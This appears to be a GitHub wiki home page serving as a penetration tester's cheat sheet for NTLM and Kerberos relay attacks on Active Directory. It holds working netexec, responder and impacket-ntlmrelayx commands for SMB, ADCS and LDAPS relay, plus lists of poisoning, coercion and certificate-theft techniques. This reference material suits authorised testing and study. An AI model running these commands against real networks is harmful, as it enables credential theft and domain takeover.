Home - oscpname/RELAY_scenarios GitHub Wiki
Welcome to the RELAY_scenarios wiki!
THEORY
AD mindmap: https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
NTLML: https://en.hackndo.com/ntlm-relay/
Potato: https://www.r-tec.net/r-tec-blog-windows-is-and-always-will-be-a-potatoland.html
Kerberos: https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png
Tools:
- https://github.com/decoder-it/KrbRelayEx-RPC
- https://github.com/dirkjanm/krbrelayx
- https://github.com/nullenc0de/relaytoolkit
CLASSIC
# Check SMB notsigned hosts for relay:
netexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# start responder
responder -I <interface> -wrf
#SMB Relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
#ADCS Relay
impacket-ntlmrelayx -tf targets.txt -t http://dc/certsrv/certfnsh.asp -smb2support
#LDAPS Relay
impacket-ntlmrelayx -tf targets.txt -t ldaps://dc -wh attacker-wpad --delegate-accessSCENARIOS
- 2025: SMB downgrade to WEBDAV and then relay
- 2025: Standard relay with auto execution
- 2025: DNS poison\spoof with unsecure update and relay with KrbRelatex-RPC
- 2024: DNS poison\spoof with unsecure update and Kerberos: KrbRelay-SMBServer
- 2019: DNS poison\spoof with unsecure update and NTLM: SMB relay
- 2019: Rubeus monitor
- NO USER, but have IPv6 > krbrelayx + mitm6
- NO USER, but LLMNR > krbrelayx + responder OR krbrelayx + pretender
- NO USER, but DNS update possible\insecure > krbjack + adddns + KrbRelay-SMBServer
- NO USER, just MITM > KrbRelayEx
TYPICAL STEPS
Initial Reconnaissance
- Detects broadcast protocols (LLMNR/NBT-NS/mDNS)
- Identifies systems with SMB signing disabled
- Discovers potential ADCS endpoints
- Maps attack surface
Active Collection
- Broadcast protocol poisoning
- DHCP WPAD injection
- Multiple coercion file deployment
- IPv6 DNS takeover
Relay Attacks
- SMB relay with SOCKS proxy
- LDAPS relay with computer account creation
- ADCS certificate theft
- Shadow Credentials attacks
Individual Techniques
Protocol Poisoning
- LLMNR/NBT-NS/mDNS responses
- WPAD injection
- IPv6 DNS takeover
Coercion Files
- WebDAV search connectors
- SCF files
- URL shortcuts
- Print notifications
Relay Capabilities
- SMB relay
- LDAPS relay
- ADCS relay
- SOCKS proxy support